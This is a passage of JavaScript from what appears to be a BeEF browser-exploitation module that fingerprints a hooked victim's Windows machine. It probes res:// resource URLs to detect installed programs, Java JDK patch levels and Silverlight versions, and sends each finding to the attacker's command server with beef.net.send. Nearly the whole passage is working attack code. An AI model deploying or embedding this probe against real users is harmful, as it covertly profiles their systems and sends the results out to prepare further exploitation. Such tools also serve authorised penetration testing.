    ["Microsoft Outlook 2003", "Microsoft Office\\OFFICE11\\OUTLOOK.EXE/16/1"],

557
    ["Microsoft Outlook 2007", "Microsoft Office\\OFFICE12\\OUTLOOK.EXE/16/1"],

558
    ["Microsoft Outlook 2010", "Microsoft Office\\OFFICE14\\OUTLOOK.EXE/16/1"],

559
    ["Yahoo Messenger", "Yahoo!\\Messenger\\YahooMessenger.exe/16/1"],

560
    ["Yahoo Messenger 5", "Yahoo!\\Messenger\\YPager.exe/16/1"],

561
    ["Yahoo Messenger 6", "Yahoo!\\Messenger\\asw.d11/16/1"],

562
    ["Yahoo Messenger 7", "Yahoo!\\Messenger\\yxtldr.d11/16/1"],

563
    ["Yahoo Messenger 8", "Yahoo!\\Messenger\\P2PCE.d11/16/1"],

564
    ["Yahoo Messenger 9", "Yahoo!\\Messenger\\GIPSVoiceEngineDLL_MD.d11/16/1"],

565
    ["Yahoo Messenger 10", "Yahoo!\\Messenger\\ConnectionWizard.d11/16/1"],

566
    ["Flashget", "FlashGet\\flashget.exe/16/1"],

567
    ["Flashget", "FlashGet Network\\FlashGet 3\\Flashget3.exe/16/1"],

568
    ["Thunder", "Thunder Network\\Thunder\\Thunder.exe/16/1"],

569
    ["Thunder", "Thunder Network\\Thunder\\Program\\Thunder.exe/16/1"],

570
    ["Thunder", "Thunder Network\\Thunder6\\Thunder.exe/16/1"],

571
    ["eMule", "eMule\\emule.exe/16/1"],

572
    ["eMule", "easyMule2\\easyMule.exe/16/1"],

573
    ["BT", "BitComet\\BitComet.exe/16/1"],

574
    ["QDownload", "Tencent\\QQDownload\\QQDownload.exe/16/1"],

575
    ["BitSpirit", "BitSpirit\\BitSpirit.exe/16/1"],

576
    ["Serv—U", "RhinoSoft.com\\Serv—U\\Serv—U.exe/16/1"],

577
    ["radmin", "Radmin\\radmin.exe/16/1"],

578


579
    // The following signatures were taken from AttackAPI

580
    // https://code.google.com/p/attackapi/source/browse/tags/attackapi-2.5.0b/lib/dom/signatures.js

581
    ['L0pht Crack 5', '@stake\\LC5\\lc5.exe/#2/#102'],

582
    ['Adobe Acrobat 7', 'adobe\\acrobat 7.0\\acrobat\\acrobat.dll/#2/#210'],

583
    ['Ahead Nero', 'ahead\\nero\\nero.exe/#2/NEROSESPLASH'],

584
    ['Azureus', 'azureus\\uninstall.exe/#2/#110'],

585
    ['Cain', 'cain\\uninstal.exe/#2/#106'],

586
    ['Citrix', 'Citrix\\icaweb32\\mfc30.dll/#2/#30989'],

587
    ['PGP Desktop', 'PGP Corporation\\PGP Desktop\\PGPdesk.exe/#2/#600'],

588
    ['Google Toolbar', 'Google\\googleToolbar1.dll/#2/#120'],

589
    ['Flash MX 2004', 'Macromedia\\Flash MX 2004\\flash.exe/#2/#4395'],

590
    ['MSN Messenger', 'Messenger\\msmsgs.exe/#2/#607'],

591
    ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7\\console\\7.5.2302.14\\pwresources_zh_tt.dll/#2/#9006'],

592
    ['Microsoft Excel 2003', 'Microsoft Office\\Office11\\excel.exe/#34/#904'],

593
    ['Microsoft Office 2003', 'Microsoft Office\\Office11\\1033\\MSOhelp.exe/#2/201'],

594
    ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8\\common7\\ide\\devenv.exe/#2/#6606'],

595
    ['Microsoft Movie Maker', 'Movie Maker\\moviemk.exe/RT_JPG/sample1'],

596
    ['Picasa2', 'picasa2\\picasa2.exe/#2/#138'],

597
    ['Quicktime', 'quicktime\\quicktimeplayer.exe/#2/#403'],

598
    ['Real VNC4', 'RealVNC\\VNC4\\vncviewer.exe/#2/#120'],

599
    ['OLE View', 'Resource Kit\\oleview.exe/#2/#2'],

600
    ['Secure CRT', 'SecureCRT\\SecureCRT.exe/#2/#224'],

601
    ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus\\vpc32.exe/#2/#157'],

602
    ['Ultramon', 'ultramon\\ultramondesktop.exe/#2/#108'],

603
    ['VMware Workstation', 'vmware\\vmware workstation\\vmware.exe/#2/#508'],

604
    ['Winamp', 'winamp\\winamp.exe/#2/#109'],

605
    ['Windows Media Player', 'Windows Media Player\\wmsetsdk.exe/#2/#249']

606
  ];

607


608
  beef.debug("[Detect Software] Enumerating installed software...");

609
  for (var dir=0;dir<program_dirs.length; dir++) {

610
    for (var i=0; i<software.length; i++) {

611
      var img    = new Image;

612
      img.title  = software[i][0];

613
      img.src    = "res://" + drive + ":\\" + program_dirs[dir] + "\\" + software[i][1];

614
      img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); }

615
      img.onerror= function() { dom.removeChild(this); }

616
      dom.appendChild(img);

617
    }

618
  }

619


620
  // Enumerate Java JDK installs

621
  beef.debug("[Detect Software] Enumerating JDK installs...");

622
  var java_versions = ['1.8.0', '1.7.0', '1.6.0'];

623
  for (var dir=0;dir<program_dirs.length; dir++) {

624
    for (var v=0; v<java_versions.length; v++) {

625
      for (var patch_level=0; patch_level<100; patch_level++) {

626
        var pad = '';

627
        if (patch_level < 10) pad = '0';

628
        var img    = new Image;

629
        img.title  = "Java JDK" + java_versions[v] + "_" + pad + patch_level;

630
        img.src    = "res://" + drive + ":\\" + program_dirs[dir] + "\\Java\\jdk" + java_versions[v] + "_" + pad + patch_level + "\\jre\\bin\\awt.dll/2/CHECK_BITMAP";

631
        img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); }

632
        img.onerror= function() { dom.removeChild(this); }

633
        dom.appendChild(img);

634
      }

635
    }

636
  }

637


638
  // Enumerate Silverlight installs

639
  beef.debug("[Detect Software] Enumerating Silverlight installs...");

640
  var silverlight_versions = [

641
    '5.1.50901.0',

642
    '5.1.50709.0',

643
    '5.1.50428.0',

644
    '5.1.41212.0',

645
    '5.1.41105.0',

646
    '5.1.40728.0',

647
    '5.1.40416.0',

648
    '5.1.31211.0',

649
    '5.1.30514.0',

650
    '5.1.30214.0',

651
    '5.1.20913.0',

652
    '5.1.20513.0',

653
    '5.1.20125.0',

654
    '5.1.10411.0',

655
    '5.0.61118.0',

656
    '5.0.60818.0',

657
    '5.0.60401.0',

658
    '4.1.10329.0',

659
    '4.1.10111.0',

660
    '4.0.60831.0',

661
    '4.0.60531.0',

662
    '4.0.60310.0',

663
    '4.0.60129.0',

664
    '4.0.51204.0',

665
    '4.0.50917.0',

666
    '4.0.50826.0',

667
    '4.0.50524.00',

668
    '4.0.50401.00',

669
    '3.0.50611.0',

670
    '3.0.50106.00',

671
    '3.0.40818.00',

672
    '3.0.40723.00',

673
    '3.0.40624.00',

674
    '2.0.40115.00',

675
    '2.0.31005.00',

676
    '1.0.30715.00',

677
    '1.0.30401.00',

678
    '1.0.30109.00',

679
    '1.0.21115.00',

680
    '1.0.20816.00'

681
  ];

682


683
  for (var dir=0;dir<program_dirs.length; dir++) {

684
    for (var i=0; i<silverlight_versions.length; i++) {

685
      var img    = new Image;

686
      img.title  = silverlight_versions[i];

687
      img.src    = "res://" + drive + ":\\" + program_dirs[dir] + "\\Microsoft Silverlight\\" + silverlight_versions[i] + "\\npctrl.dll/2/102";

688
      img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=Microsoft Silverlight v" + this.title); dom.removeChild(this); }

689
      img.onerror= function() { dom.removeChild(this); }

690
      dom.appendChild(img);

691
    }

692
  }

693
});

694


695


696